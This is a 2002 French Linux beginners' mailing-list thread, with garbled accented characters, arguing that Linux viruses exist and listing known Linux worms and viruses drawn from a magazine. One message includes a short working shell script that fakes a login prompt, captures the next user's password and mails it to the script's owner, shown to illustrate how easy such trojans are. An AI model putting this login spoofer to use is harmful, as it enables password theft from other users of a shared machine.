Ce qui m'�nerve un peu (sans t'en vouloir en aucune mani�re) c'est
l'impression que j'ai (peut-�tre � tort) que des personnes ayant acc�s � un
certain type de connaissance se sentent empli de puissance avec ces
connaissances et refusent de les partager, voir m�me essaye de limiter leur
divulgation dans l'espoir difficilement avouable d'�tre un des seuls �
conna�tre ces petits secrets. Ce n'ai peut-�tre pas ton cas mais c'est le
cas de beaucoup de personnes. Et je trouve que �a va � l'encontre de
l'esprit du monde libre qui lui, travaille en coop�ration.
Ce que je trouve dommage c'est que le speach (que j'ai mit 45mn � �crire
pour expliquer que les virus sous linux existent (et m�me 1
Window-Linux),explications et preuves � l'appui avec des citations de LFM
(pour faire plus court) ainsi qu'un petit script pour montrer � quel point
cela peut-�tret facile....)
s'est perdu apparemment au niveau du "mod�rateur". Je pensais que ce mail
allez dans le sens d'une r�ponse aux questions que se posaient des personnes
de cette liste � propos des virus et de linux. Surtout quand j'entend dire
qu'il est impossible pour un virus d'affecter un syst�me Linux.Je n'ai fait
que reproduire des propos parus dans un journal et qui ne sont en aucune
mani�re r�prehensibles, mais ce n'est pas � moi de d�cider de ce qui doit
passer ou pas sur cette liste de diffusion.
Ceci �tant dit je joint en pi�ce jointe une copie de mon mail pr�c�dent. Au
responsable de la liste de decider s'il veut la supprimer.
Amicalement
Silkscalp
----- Original Message -----
From: "Lilicoli" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, June 25, 2002 11:37 PM
Subject: Re: [debutant] info
At 19:50 25/06/02 +0200, you wrote:
>Je vois pas pourquoi tu veux pas citer ces journaux qui sont pourtant de
>tr�s bonne qualit�. Et puis les gens sont assez grands pour ne pas avoir
>envie de passer par la case prison (c'est tr�s fr�quent, lisez Hackers News
>Magazine vous verrez). Il faut pas les prendre comme des attard�s ou des
>irresponsables, il vaut mieux les laisser agir selon leur conscience...
Bien s�r, mais ce n'est pas par rapport � *ta* conscience ou *ton* niveau
de responsabilit�, mon titi, que je ne citais pas le journal mais par
rapport � *ma* conscience � moi que j'ai.
>Silkscalp
ouais je sais t'es pas mon titi, mais comme t'as l'air vex� faut bien que
je d�dramatise un peu.
--
Lilicoli
----------------------------------------------------------------------------
----
> Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft?
> Rendez-vous sur "http://www.mandrakestore.com";
>
--- Begin Message ---
Ce type de virii qui peut attaquer autant Window que Linux existe bel et
bien . D'ailleurs Winux fait partie de ce type de virus et il est connu
depuis plus d'1 an maintenant.
J'esp�re que la lecture de ce qui suit poura vous �clairer un peu plus sur
les virus.
Une grande partie du texte ci-dessous est tir� de Linux Francez Magazine HS
N�8.
Pour plus de pr�cisions, se reporter au Linux France Magazine hors s�rie n�8
(juin ou juillet 2001).
Silkscalp
Il existe 4 types de virus sous linux (d'autre en donneront plus mais tout
les virus peuvent se classer dans ce qui suis) :
-Les virus : ils se reproduisent en infectant le code de programmes h�tes.
-Les Troyans horses (ou chevaux de troie) : il �x�cutent des t�ches malignes
en se cachant dans une application d'aspect innoffensif.
-Les vers (ou worms) qui prolif�rent gr�ce aux r�seaux informatiques. Un des
moyens de propagation �tant l'email.
-Les backdoors (ou acc�s cach�s, litt�ralement "porte de derri�re") :
permet � un utilisateur externe de prendre le contr�le de la machine ou au
moins permet d'y avoir un acc�s. Dans le cas d'un acc�s utilisateur il
faudra passer par "une �l�vation de privil�ges" pour devenir root.
La classification n'est pas facile mais grosso-modo elle peut s'appliquer �
tout les virii.
A l'origine existait un jeu tr�s pris� par les programmeurs qui s'appelait
"core war" provenant des labo de Bell d'AT&T consistant � � faire
fonctionner en parrall�le dans un environnement m�moire limit� un petit
programme dont le but est de d�truire les autres programme. "Le syst�me
d'exploitation n'offrait pas de protection entre les espaces m�moires des
diff�rents programmes, aussi leur �tait-il possible de s'aggresser
mutuellement pour essayer de tuer les concurrents. Pour cela certain
bombardaient avec des 0 la zone m�moire la plus large possible, d'autres ce
d�placaient en permanence dans l'epace d'adressage en esp�rant �craser le
code d'un adversaire.Certains m�mes coop�raient � plusieurs pour �liminer un
adversaire coriace." (Linux France Mag Hors S�rie n�8) .
J'exclue bien evidemment des virus pouvant toucher un syst�me linux, les
macros qui sont sp�cifiques au syt�me Kro$oftien et � sa suite de merde (ce
n'est qu'un avis personnel ). Un virus Win-Linux est th�oriquement possible
(ainsi qu'en pratique d'ailleur) avec l'�quivalent de 2 codes, cherchant le
syst�me sur lequel il se trouve pour savoir agir en cons�quence. Ce serait
n�anmoins tr�s faible car il y a trop de diff�rences entre les syst�mes
diff�rents syst�me Linux et le code ne pourra�t pas agir sur tout les
syst�mes � moins d'�tre tr�s gros ( un virus de 12 Mo c'est pas terrible...)
J'aimerai souligner qu'un virus r�sident en m�moire peut patiemment attendre
un �v�nement pr�cis pour agir. Par exemple le virus pourrais provoquer d'un
d�bordement de tampon et en profiter pour acc�der au droit Root. Il suffit
au prog ( je rappel qu' un virus c'et avant tout un programme) d'attendre
patiemment l'appel d'un programme ayant le bit SetUID. Je rappelle qu'un
exploit de WU-FTPD permettait ( gr�ce � un buffer overflow) d'acc�der � un
shell root...
Mais il est vrai que le syst�me des droits de fichier et des permission de
Linux emp�che une propagation classique du virus(copie directe de son code
dans d'autre fichiers) et oblige � ruser en permanence pour profiter des
failles existantes et donc fait que l'efficacit� du virus est totalement
tributaire des failles pr�sentes et des versions des programme install�s
sur le syst�me. C'est pour cela que beaucoup de personnes concluent �
l'impossibilit� pure et simple de l'existance de virus sur Linux. A cela il
faut objecter l'existance officielle d'au moins une dizaine de virus sous
linux en date de Juillet 2001 (je lisait mon Linux France Hors S�rie n�8
d�di� � la s�curit� sur la plage). Voici la liste de LinuxFranceMag
hors-s�rie 8
1) Bliss (d�sinfection automatique de l'executable si on l'invoque avec
l'option -bliss-disinfect-files-please
2) Diesel
3) Kagob : utilise un fichier temporaire pour executer le programme orginal
infect�
4) Satyr
5)Vit4096 : n'infecte que les fichiers du r�pertoire courant
6)Winter : Le code du virus est contenu dans 341 octets. Il n'infecte que
les fichiers du r�pertoire courant
7)Winux : Ce virus contient 2 codes diff�rents et peut attaquer autant les
fichiers Window que Elf Linux. Toutefois il n'est pasq capable d'explorer
des partitions diff�rentes de celle o� il est stock�, ce qui limite de fait
sa diffusion.
8)ZipWorm Ins�re dans les fichiers Zip qu'il rencontre, des textes "Trolls"
sur Linux et Window.
9)Lion(li0n) : exploite une faille de BIND : installe une backdoor sur le
port 10008 et un root-kit sur la machine infect�e.
10)Ramen : faille lpr, nfs,wu-ftpd : modifie les fichiers index.html qu'il
rencontre.
11)Ador (Red Worm) : faille lpr;BIND ,rpc,wu-ftpd :
installe une backdoor et un root-kit sur la machine infect�e installe une
version modifi�e de ps pour masquerses processus et envoie les info � une
adresse email en chine.
12)Cheese faille : comme li0n : Vers pr�tendu "bienfaisant" v�rifiant et
�liminant les acc�s cach� et ouvert par Lion(li0n).
Donc la preuve est faite de l'existance d'un virus bi-OS en l'occurence
Winux.
Je ne dit pas que ce virus SILMILE.E (c'est sous ce nom l� que j'en ai
entendu parl�) existe ou pas, je signale simplement qu'un virus windob-linux
est possible mais que son aggr�ssivit� serait tr�s faible sur les syst�me
linux car le code devrait prendre en compte les nombreuses differences entre
les distributions et les diff�rentes versions des logiciels de chaque
distrib. Ce qui en r�duit d'autant plus l'influence et augmente
proportionnellement la taille du code. Cependant le script (tr�s) qui suit
est une backdoor linux. Vous pouvez juger vous m�me de l'extr�me simplicit�
du code :
#! /bin/sh
clear
cat /etc.issue
echo -n "login: "
read login
echo -n "Password: "
stty -echo
read passwd
stty sane
mail $USER <<- fin
login : $login
passwd : $passwd
fin
echo "Login Incorrect"
Pour qu'il se deconnecte en se terminant il faut lancer ce script avec la
commane exec du shell.
Ce code permet de capturer le pass de la prochaine personne voulant se
connecter. Il fait croire � l'utilisateur qu'il a rentr� un pass incorrect
et le pousse � se reconnecter. Le 1er essai �tant envoy� par mail...
Une solution consiste � prendre l'habitude de toujours de rentrer un premier
pass incorrect. pour �tre s�r de toujour avoir affaire au syst�mede
connexion officiel.(Linux France Mag
Je conluerai qu'il ne faut jamais dire "Virus tu ne me contaminera jamais"
car les virologues inventent tout les jours de nouvelle m�thodes de
propagations que ce soit des appels a une biblioth�que qui sont d�tourn�s
ou d'autres m�thodes emprunt�es � des techniques de hacking.(Par exemple
Code Red utilisait une faille unicode de IIS).
Si quelqu'un se penche sur le probl�me de la propagation des virii quelque
semaines il s'apercevra de la facilit� de cr�ation de cette m�chante
b�bette.
Ceci n'est en aucune fa�on une insitation � la cr�ation de virus. De plus
les scriptKiddies qui voudraient exp�rimenter la cr�ation de virus sous Unix
auront du mal :)
En effet les m�thodes de propagation sont carr�ment plus complexe que sous
windows et ne sont pas � la port�e du premier venu comme c'est le cas pour
window.
Donc il vaut mieux qu'il s'attquent � window qu'� un linux ne serait-ce que
par �thique morale... et surtout car la pr�sence de log est beaucoup plus
fr�quente sous unix que sous windows et car un virus sous Linux aura peu
d'influence. Seul les chevaux de troie peuvent fonctionner au maximum de
leur puissance.
Je rappelle que l'envoi conscient de virus est ill�gale et puni de lourdes
peines de prison.
Silkscalp
>> Etonnant comme info !
> >
> > Un virus est un bout de programme dont la fonction la plus grave est de
> > detruire une partie de votre systeme ou des donnees , or sous Linux ou
> > Unix il faut avoir les privileges de super-utilisateur pour faire ca et
> > donc si un programme arrive a obtenir ces droits , le virus devient
> > alors inutile ! C est pour ca qu on dit que sous Unix et linux il ne
peut
> > y avoir de virus
> >
> > @+
> > Robin
>
> De plus, � ma connaissance, le code binaire composante principale de virus
> entre Win et linux et diff�rents ce qui implique que ce virus dispose des
> deux codes et soit en mesure de savoir sur quels syst�me il est install�
ce
> qui n�cessite du code => donc �a se mord la queue.
>
> Second cas de figure les macros : comme ces virus macros sont li�s � un
> programme particulier (outlook excel ...) voir m�me une version
> particuli�re, je me demande comment un tel virus pourrait �tre efficace
sur
> Linux.
>
> Je ne suis pas un sp�cialiste des virus, mais ce sont quelques points de
> r�flexions et id�es que je me suis faites.
>
> Aux sp�cialistes de confirmer ou d�mentir.
>
> A+
>
> --
> La theorie, c'est quand on comprend tout mais que rien ne marche.
> La pratique, c'est quand ca marche sans qu'on ne sache pourquoi.
> Les ingenieurs rassemblent les deux:
> rien ne marche et ils ne savent pas pourquoi. ULg
> Christophe Josselin
>
>
----------------------------------------------------------------------------
----
> Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft?
> Rendez-vous sur "http://www.mandrakestore.com";
>
--- End Message ---
Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft?
Rendez-vous sur "http://www.mandrakestore.com";
